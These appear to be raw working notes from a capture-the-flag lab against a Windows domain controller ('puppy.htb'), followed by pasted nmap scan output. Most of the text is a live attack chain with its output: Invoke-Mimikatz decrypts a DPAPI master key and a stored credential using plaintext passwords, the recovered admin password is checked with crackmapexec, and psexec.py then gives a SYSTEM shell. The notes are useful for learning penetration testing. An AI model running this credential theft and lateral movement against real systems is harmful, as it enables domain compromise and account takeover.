Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> whoami
puppy\steph.cooper
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> hostname
DC
steph.cooper SHELL !
steph.cooper -> steph.cooper_adm:
donpapi collect -t 10.129.113.196 -d puppy.htb -u steph.cooper -p 'ChefSteph2025!' #NOPE
Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\ -Force
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials> Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\ -Force
Directory: C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 8:14 AM 11068 DFBE70A7E5CC19A398EBF1B96859CE5D
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials>
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::dpapi" "exit"'
#NOPE, no master key found in sekurlsa::dpapi.
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D" "exit"'
mimikatz(powershell) # dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {556a2412-1275-4ccf-b721-e6a0b4f90407}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data
[SNIP]
556a2412-1275-4ccf-b721-e6a0b4f90407 - Master Key
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft> cd Protect
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> dir
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 2/23/2025 2:36 PM S-1-5-21-1487982659-1829050783-2281216199-1107
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:40 AM 740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs- 2/23/2025 2:36 PM 24 Preferred
556a2412-1275-4ccf-b721-e6a0b4f90407 = Master Key.
Works !:
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407" "/sid:S-1-5-21-1487982659-1829050783-2281216199-1107" "/password:ChefSteph2025!" "/protected" "exit""'
[masterkey] with password: ChefSteph2025! (protected user)
key : d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
sha1: 3c3cf2061dd9d45000e9e6b49e37c7016e98e701
[backupkey] without DPAPI_SYSTEM:
key : 1a943a912fa315c7f9eced48870b613d9e75b467d13d618bbad9262ef3f2c567
sha1: 469928729f9405d7ba46a22de53071b2e1d81fb9
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" "exit"'
#EMPTY = No credential discovered there.
Time to use other Microsoft Credentials in Roaming Folder:
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> ls -force
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9" "exit"'
mimikatz(powershell) # dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {556a2412-1275-4ccf-b721-e6a0b4f90407}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 0000003a - 58
szDescription : Enterprise Credential Data
Same Master Key so we gonna use the decrypt master key as usual.
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" "exit"'
[SNIP]
Decrypting Credential:
* masterkey : d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000c8 - 200
credUnk0 : 00000000 - 0
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 3/8/2025 3:54:29 PM
unkFlagsOrSize : 00000030 - 48
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:target=PUPPY.HTB
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : steph.cooper_adm
CredentialBlob : FivethChipOnItsWay2025!
Attributes : 0
steph.cooper_adm credential discovered !
steph.cooper_adm:FivethChipOnItsWay2025!
crackmapexec smb 10.129.113.196 -u steph.cooper_adm -p FivethChipOnItsWay2025!
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.113.196 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.113.196 445 DC [+] PUPPY.HTB\steph.cooper_adm:FivethChipOnItsWay2025! (Pwn3d!)
sudo rlwrap psexec.py 'puppy.htb/steph.cooper_adm:FivethChipOnItsWay2025!@10.129.113.196'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.113.196.....
[*] Found writable share ADMIN$
[*] Uploading file dxtsuKPY.exe
[*] Opening SVCManager on 10.129.113.196.....
[*] Creating service PVaB on 10.129.113.196.....
[*] Starting service PVaB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.3453]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
DC
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 311D-593C
Directory of C:\Users\Administrator\Desktop
05/12/2025 07:34 PM <DIR> .
03/11/2025 09:14 PM <DIR> ..
05/27/2025 04:31 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,744,788,992 bytes free
C:\Users\Administrator\Desktop> type root.txt
REDIRECTED
ROOT.TXT: REDIRECTED
Don't Work !:
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"" "/rpc" "exit"'
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"" "/sid:S-1-5-21-1487982659-1829050783-2281216199-1107" "/password:ChefSteph2025!" "/protected" "exit"'
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"" "/sid:S-1-5-21-1487982659-1829050783-2281216199-1107" "/password:ChefSteph2025!" "/protected" "exit"'
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107"" "/rpc" "exit"'
Invoke-Mimikatz -Command '""privilege::debug"" ""token::elevate"" ""dpapi::masterkey /in:""C:\Users\epugh\AppData\Roaming\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\7dc6a492-36e2-4c2d-be66-ba29d263dda2"" ""/sid:S-1-5-21-1396373213-2872852198-2033860859-1151"" ""/password:Sarah2017"" ""/protected"" ""exit""'
9389/tcp open mc-nmf .NET Message Framing (Active Directory Web Services - adws)
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc Microsoft Windows RPC
55868/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-23T00:32:38
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 6h59m55s
----------------------Starting UDP Scan------------------------
PORT STATE SERVICE
53/udp open domain
111/udp open rpcbind
123/udp open ntp
389/udp open ldap
2049/udp open nfs
PORT STATE SERVICE VERSION
53/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
111/udp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
123/udp open ntp NTP v3
389/udp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
2049/udp open mountd 1-3 (RPC #100005)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows